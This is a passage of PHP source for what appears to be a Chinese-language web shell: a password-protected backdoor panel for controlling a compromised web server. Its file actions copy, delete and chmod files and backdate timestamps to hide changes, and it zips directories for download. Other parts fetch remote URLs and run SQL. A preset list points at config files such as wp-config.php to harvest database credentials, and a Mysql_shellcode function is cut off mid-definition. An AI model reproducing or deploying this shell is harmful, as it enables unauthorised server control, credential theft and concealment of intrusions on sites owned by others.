1942 fclose($this->fp);
1943 }
1944 }
1945
1946function File_Act($array,$actall,$inver,$REAL_DIR)
1947{
1948 if(($count = count($array)) == 0) return '请选择文件';
1949 if($actall == 'e')
1950 {
1951 function listfiles($dir=".",$faisunZIP,$mydir){
1952 $sub_file_num = 0;
1953 if(is_file($mydir."$dir")){
1954 if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir")){
1955 $faisunZIP -> addfile(file_get_contents($mydir.$dir),"$dir");
1956 return 1;
1957 }
1958 return 0;
1959 }
1960
1961 $handle=opendir($mydir."$dir");
1962 while ($file = readdir($handle)) {
1963 if($file=="."||$file=="..")continue;
1964 if(is_dir($mydir."$dir/$file")){
1965 $sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
1966 }
1967 else {
1968 if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir/$file")){
1969 $faisunZIP -> addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
1970 $sub_file_num ++;
1971 }
1972 }
1973 }
1974 closedir($handle);
1975 if(!$sub_file_num) $faisunZIP -> addfile("","$dir/");
1976 return $sub_file_num;
1977 }
1978
1979 function num_bitunit($num){
1980 $bitunit=array(' B',' KB',' MB',' GB');
1981 for($key=0;$key<count($bitunit);$key++){
1982 if($num>=pow(2,10*$key)-1){ //1023B 会显示为 1KB
1983 $num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
1984 }
1985 }
1986 return $num_bitunit_str;
1987 }
1988
1989 $mydir=$REAL_DIR.'/';
1990 if(is_array($array)){
1991 $faisunZIP = new PHPzip;
1992 if($faisunZIP -> startfile("$inver")){
1993 $filenum = 0;
1994 foreach($array as $file){
1995 $filenum += listfiles($file,$faisunZIP,$mydir);
1996 }
1997 $faisunZIP -> createfile();
1998 return "压缩完成,共添加 $filenum 个文件.<br><a href='$inver'>点击下载 $inver (".num_bitunit(filesize("$inver")).")</a>";
1999 }else{
2000 return "$inver 不能写入,请检查路径或权限是否正确.<br>";
2001 }
2002 }else{
2003 return "没有选择的文件或目录.<br>";
2004 }
2005
2006
2007 }
2008 $i = 0;
2009 while($i < $count)
2010 {
2011 $array[$i] = urldecode($array[$i]);
2012 switch($actall)
2013 {
2014 case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break;
2015 case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break;
2016 case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break;
2017 case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break;
2018 }
2019 $i++;
2020 }
2021 return '所选文件'.$msg.'完毕';
2022}
2023
2024function start_unzip($tmp_name,$new_name,$todir='zipfile'){
2025$zip = new ZipArchive() ;
2026if ($zip->open($tmp_name) !== TRUE) {
2027echo '抱歉!压缩包无法打开或损坏';
2028}
2029$zip->extractTo($todir);
2030$zip->close();
2031echo '解压完毕! <a href="?eanver=main&path='.urlencode($todir).'">进入解压目录</a> <a href="javascript:history.go(-1);">返回</a>';
2032}
2033
2034function muma($filecode,$filetype){
2035 $dim = array(
2036 "php" => array("eval(","exec("),
2037 "asp" => array("WScript.Shell","execute(","createtextfile("),
2038 "aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
2039 "jsp" => array("runtime.exec(")
2040 );
2041 foreach($dim[$filetype] as $code){
2042 if(stristr($filecode,$code)) return true;
2043 }
2044}
2045
2046function debug($file,$ftype){
2047 $type=explode('|',$ftype);
2048 foreach($type as $i){
2049 if(stristr($file,$i)) return true;
2050 }
2051}
2052
2053/*---string---*/
2054
2055function str_path($path){
2056 return str_replace('//','/',$path);
2057}
2058
2059function msg($msg){
2060 die("<script>window.alert('".$msg."');history.go(-1);</script>");
2061}
2062
2063function uppath($nowpath){
2064 $nowpath = str_replace('\\','/',dirname($nowpath));
2065 return urlencode($nowpath);
2066}
2067
2068function xxstr($key){
2069 $temp = str_replace("\\\\","\\",$key);
2070 $temp = str_replace("\\","\\\\",$temp);
2071 return $temp;
2072}
2073
2074/*---html---*/
2075
2076function html_ta($url,$name){
2077 html_n("<a href=\"$url\" target=\"_blank\">$name</a>");
2078}
2079
2080function html_a($url,$name,$where=''){
2081 html_n("<a href=\"$url\" $where>$name</a> ");
2082}
2083
2084function html_img($url){
2085 html_n("<img src=\"?img=$url\" border=0>");
2086}
2087
2088function back(){
2089 html_n("<input type='button' value='返回' onclick='history.back();'>");
2090}
2091
2092function html_radio($namei,$namet,$v1,$v2){
2093 html_n('<input type="radio" name="return" value="'.$v1.'" checked>'.$namei);
2094 html_n('<input type="radio" name="return" value="'.$v2.'">'.$namet.'<br><br>');
2095}
2096
2097function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
2098 if($mode){
2099 html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
2100 }else{
2101 html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");
2102 }
2103}
2104
2105function html_base(){
2106html_n('function base64encode(str){
2107 var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
2108 var out, i, len;
2109 var c1, c2, c3;
2110 len = str.length;
2111 i = 0;
2112 out = "";
2113 while (i < len) {
2114 c1 = str.charCodeAt(i++) & 0xff;
2115 if (i == len) {
2116 out += base64EncodeChars.charAt(c1 >> 2);
2117 out += base64EncodeChars.charAt((c1 & 0x3) << 4);
2118 out += "==";
2119 break;
2120 }
2121 c2 = str.charCodeAt(i++);
2122 if (i == len) {
2123 out += base64EncodeChars.charAt(c1 >> 2);
2124 out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
2125 out += base64EncodeChars.charAt((c2 & 0xF) << 2);
2126 out += "=";
2127 break;
2128 }
2129 c3 = str.charCodeAt(i++);
2130 out += base64EncodeChars.charAt(c1 >> 2);
2131 out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
2132 out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
2133 out += base64EncodeChars.charAt(c3 & 0x3F);
2134 }
2135 return out;
2136}
2137function utf16to8(str) {
2138var out, i, len, c;
2139out = "";
2140len = str.length;
2141for(i = 0; i < len; i++) {
2142c = str.charCodeAt(i);
2143if ((c >= 0x0001) && (c <= 0x007F)) {
2144out += str.charAt(i);
2145} else if (c > 0x07FF) {
2146out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
2147out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
2148out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
2149} else {
2150out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
2151out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
2152}
2153}
2154return out;
2155}
2156function utf8to16(str) {
2157 var out, i, len, c;
2158 var char2, char3;
2159 out = "";
2160 len = str.length;
2161 i = 0;
2162 while(i < len) {
2163 c = str.charCodeAt(i++);
2164 switch(c >> 4) {
2165 case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
2166 out += str.charAt(i-1);
2167 break;
2168 case 12: case 13:
2169 char2 = str.charCodeAt(i++);
2170 out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
2171 break;
2172 case 14:
2173 char2 = str.charCodeAt(i++);
2174 char3 = str.charCodeAt(i++);
2175 out += String.fromCharCode(((c & 0x0F) << 12) |
2176 ((char2 & 0x3F) << 6) |
2177 ((char3 & 0x3F) << 0));
2178 break;
2179 }
2180 }
2181 return out;
2182}
2183');
2184}
2185
2186function html_text($name,$cols,$rows,$value = ''){
2187 html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");
2188}
2189
2190function html_select($array,$mode = '',$change = '',$name = 'class'){
2191 html_n("<select name=$name $change>");
2192 foreach($array as $name => $value){
2193 if($name == $mode){
2194 html_n("<option value=\"$name\" selected>$value</option>");
2195 }else{
2196 html_n("<option value=\"$name\">$value</option>");
2197 }
2198 }
2199 html_n("</select>");
2200}
2201
2202function html_font($color,$size,$name){
2203 html_n("<font color=\"$color\" size=\"$size\">$name</font>");
2204}
2205
2206function GetHtml($url)
2207{
2208 $c = '';
2209 $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
2210 if(function_exists('fsockopen')){
2211 $link = parse_url($url);
2212 $query=$link['path'].'?'.$link['query'];
2213 $host=strtolower($link['host']);
2214 $port=$link['port'];
2215 if($port==""){$port=80;}
2216 $fp = fsockopen ($host,$port, $errno, $errstr, 10);
2217 if ($fp)
2218 {
2219 $out = "GET /{$query} HTTP/1.0\r\n";
2220 $out .= "Host: {$host}\r\n";
2221 $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
2222 $out .= "Connection: Close\r\n\r\n";
2223 fwrite($fp, $out);
2224 $inheader=1;
2225 while(!feof($fp))
2226 {$line=fgets($fp,4096);
2227 if($inheader==0){$contents.=$line;}
2228 if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
2229 }
2230 fclose ($fp);
2231 $c= $contents;
2232 }
2233 }
2234 if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
2235 $ch = curl_init();
2236 curl_setopt($ch, CURLOPT_URL, $url);
2237 curl_setopt($ch, CURLOPT_TIMEOUT, 15);
2238 curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
2239 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2240 $c = curl_exec($ch);
2241 curl_close($ch);
2242 }
2243 if(empty($c) && ini_get('allow_url_fopen')){
2244 $c = file_get_contents($url);
2245 }
2246 if(empty($c)){
2247 echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
2248 }
2249 if(!empty($c))
2250 {
2251 return $c;
2252 }
2253 }
2254
2255function html_main()
2256{
2257
2258 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
2259 $hsafemode = "ON (开启)";
2260 } else {
2261 $hsafemode = "OFF (关闭)";
2262 }
2263 $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
2264 $Server_OS = PHP_OS;
2265 $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
2266 $web_server = php_uname();
2267 $title = $_SERVER["HTTP_HOST"] . "/Manager";
2268 html_n("<html><title>" . $title . "</title><table width='100%'><td align='center'><b>安全模式:{$hsafemode}-----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}</b></td></table>");
2269 html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'></iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'></iframe></td></tr></table></html>");
2270}
2271
2272function islogin($shellname,$myurl){
2273print<<<END
2274<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
2275<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'>输入密码:<input name='postpass' type='password' size='22'> <input type='submit' value='登录'><br><br><br><font color=#3399FF>请勿用于非法用途,后果作者概不负责!</font><br></div></center>
2276END;
2277}
2278
2279function html_sql(){
2280 html_input("text","sqlhost","localhost","<br>MYSQL地址","30");
2281 html_input("text","sqlport","3306","<br>MYSQL端口","30");
2282 html_input("text","sqluser","root","<br>MYSQL用户","30");
2283 html_input("password","sqlpass","","<br>MYSQL密码","30");
2284 html_input("text","sqldb","dbname","<br>MYSQL库名","30");
2285 html_input("submit","sqllogin","登录","<br>");
2286 html_n('</form>');
2287}
2288
2289function Mysql_Len($data,$len)
2290{
2291 if(strlen($data) < $len) return $data;
2292 return substr_replace($data,'...',$len);
2293}
2294
2295function html_n($data){
2296 echo "$data\n";
2297}
2298
2299/*---css---*/
2300
2301function css_img($img){
2302 $images = array(
2303 "exe"=>
2304 "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
2305 "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
2306 "xhIAOw==",
2307 "dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".
2308 "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".
2309 "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
2310 "txt"=>
2311 "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
2312 "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
2313 "UpPWG3Ig6Hq/XmRjuZwkAAA7",
2314 "html"=>
2315 "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
2316 "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
2317 "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
2318 "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
2319 "ADs=",
2320 "js"=>
2321 "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
2322 "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
2323 "a00AjYYBbc/o9HjNniUAADs=",
2324 "xml"=>
2325 "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
2326 "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2327 "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
2328 "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
2329 "IQA7",
2330 "mp3"=>
2331 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
2332 "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
2333 "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
2334 "img"=>
2335 "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
2336 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
2337 "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
2338 "FxEAOw==",
2339 "title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".
2340 "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2341 "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".
2342 "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
2343 "rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".
2344 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2345 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2346 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2347 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2348 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2349 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2350 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2351 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2352 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2353 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2354 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2355 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2356 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2357 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".
2358 "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".
2359 "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".
2360 "aNOmRcjVj02tPxPCzfkvIAA7"
2361 );
2362 header('Content-type: image/gif');
2363 echo base64_decode($images[$img]);
2364 die();
2365}
2366
2367function css_showimg($file){
2368 $it=substr($file,-3);
2369 switch($it){
2370 case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break;
2371 case "htm": case "tml": return 'html';break;
2372 case "exe": case "com": return 'exe';break;
2373 case "xml": case "doc": return 'xml';break;
2374 case ".js": case "vbs": return 'js';break;
2375 case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break;
2376 case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break;
2377 default: return 'txt';break;
2378 }
2379}
2380
2381function css_js($num,$code = ''){
2382 if($num == "shellcode"){
2383 return '<%@ LANGUAGE="JavaScript" %>
2384 <%
2385
2386 %>';
2387 }
2388 html_n('<script language="javascript">');
2389 if($num == "1"){
2390 html_n(' function rusurechk(msg,url){
2391 smsg = "FileName:[" + msg + "]\nPlease Input New File:";
2392 re = prompt(smsg,msg);
2393 if (re){
2394 url = url + re;
2395 window.location = url;
2396 }
2397 }
2398 function rusuredel(msg,url){
2399 smsg = "Do You Suer Delete [" + msg + "] ?";
2400 if(confirm(smsg)){
2401 URL = url + msg;
2402 window.location = url;
2403 }
2404 }
2405 function Delok(msg,gourl)
2406 {
2407 smsg = "确定要删除[" + unescape(msg) + "]吗?";
2408 if(confirm(smsg))
2409 {
2410 if(gourl == \'b\')
2411 {
2412 document.getElementById(\'actall\').value = escape(gourl);
2413 document.getElementById(\'fileall\').submit();
2414 }
2415 else window.location = gourl;
2416 }
2417 }
2418 function CheckAll(form)
2419 {
2420 for(var i=0;i<form.elements.length;i++)
2421 {
2422 var e = form.elements[i];
2423 if (e.name != \'chkall\')
2424 e.checked = form.chkall.checked;
2425 }
2426 }
2427 function CheckDate(msg,gourl)
2428 {
2429 smsg = "当前文件时间:[" + msg + "]";
2430 re = prompt(smsg,msg);
2431 if(re)
2432 {
2433 var url = gourl + re;
2434 var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
2435 var r = re.match(reg);
2436 if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
2437 else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
2438 }
2439 }
2440 function SubmitUrl(msg,txt,actid)
2441 {
2442 re = prompt(msg,unescape(txt));
2443 if(re)
2444 {
2445 document.getElementById(\'actall\').value = actid;
2446 document.getElementById(\'inver\').value = escape(re);
2447 document.getElementById(\'fileall\').submit();
2448 }
2449 }');
2450 }elseif($num == "2"){
2451 html_n('var NS4 = (document.layers);
2452var IE4 = (document.all);
2453var win = this;
2454var n = 0;
2455function search(str){
2456 var txt, i, found;
2457 if(str == "")return false;
2458 if(NS4){
2459 if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
2460 if(n == 0) alert(str + " ... Not-Find")
2461 }
2462 if(IE4){
2463 txt = win.document.body.createTextRange();
2464 for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
2465 txt.moveStart("character", 1);
2466 txt.moveEnd("textedit")
2467 }
2468 if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
2469 else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
2470 }
2471 return false
2472}
2473function CheckDate(){
2474 var re = document.getElementById(\'mtime\').value;
2475 var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
2476 var r = re.match(reg);
2477 var t = document.getElementById(\'charset\').value;
2478 t = t.toLowerCase();
2479 if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
2480 else{document.getElementById(\'newfile\').value = base64encode(document.getElementById(\'newfile\').value);
2481 if(t=="utf-8"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}
2482');
2483if (substr(PHP_VERSION,0,1)>=5){html_n('if(t=="gbk" || t=="gb2312"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}');}
2484html_n('
2485 document.getElementById(\'editor\').submit();}
2486}');
2487}elseif($num == "3"){
2488 html_n('function Full(i){
2489 if(i==0 || i==5){
2490 return false;
2491 }
2492 Str = new Array(12);
2493 Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
2494 Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
2495 Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
2496 Str[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
2497 Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
2498 Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";
2499 Str[8] = "DELETE FROM [TableName] WHERE ID=100";
2500 Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";
2501 Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
2502 Str[11] = "DROP TABLE [TableName]";
2503 Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
2504 Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
2505 if(i<=4){
2506 DbForm.string.value = Str[i];
2507 }else{
2508 DbForm.sql.value = Str[i];
2509 }
2510 return true;
2511 }');
2512}
2513elseif($num == "4"){
2514 html_n('function Fulll(i){
2515 if(i==0){
2516 return false;
2517 }
2518 Str = new Array(8);
2519 Str[1] = "config.inc.php";
2520 Str[2] = "config.inc.php";
2521 Str[3] = "config_base.php";
2522 Str[4] = "config.inc.php";
2523 Str[5] = "config.php";
2524 Str[6] = "wp-config.php";
2525 Str[7] = "config.php";
2526 Str[8] = "mysql.php";
2527 sform.code.value = Str[i];
2528 return true;
2529 }');
2530}
2531html_n('</script>');
2532}
2533
2534function css_left(){
2535 html_n('<style type="text/css">
2536 .menu{width:152px;margin-left:auto;margin-right:auto;}
2537 .menu dl{margin-top:2px;}
2538 .menu dl dt{top left repeat-x;}
2539 .menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
2540 text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
2541 .menu dl dt a:hover{color:#FFFFCC;}
2542 .menu dl dd ul{list-style:none;}
2543 .menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
2544 background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
2545 border-style:solid;border-width:1px;}
2546 .menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
2547 </STYLE>');
2548 html_n('<script language="javascript">
2549 function getObject(objectId){
2550 if(document.getElementById && document.getElementById(objectId)) {
2551 return document.getElementById(objectId);
2552 }
2553 else if (document.all && document.all(objectId)) {
2554 return document.all(objectId);
2555 }
2556 else if (document.layers && document.layers[objectId]) {
2557 return document.layers[objectId];
2558 }
2559 else {
2560 return false;
2561 }
2562 }
2563 function showHide(objname){
2564 var obj = getObject(objname);
2565 if(obj.style.display == "none"){
2566 obj.style.display = "block";
2567 }else{
2568 obj.style.display = "none";
2569 }
2570 }
2571 </script><div class="menu">');
2572}
2573
2574function css_main(){
2575 html_n('<style type="text/css">
2576 *{padding:0px;margin:0px;}
2577 body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
2578 body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
2579 height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
2580 input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
2581 a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
2582 .actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
2583 </STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
2584 <table width="85%" border=0 bgcolor="#555555" align="center">');
2585}
2586
2587function css_foot(){
2588 html_n('</td></tr></table>');
2589}
2590
2591function Mysql_shellcode()
2592{
2593 return 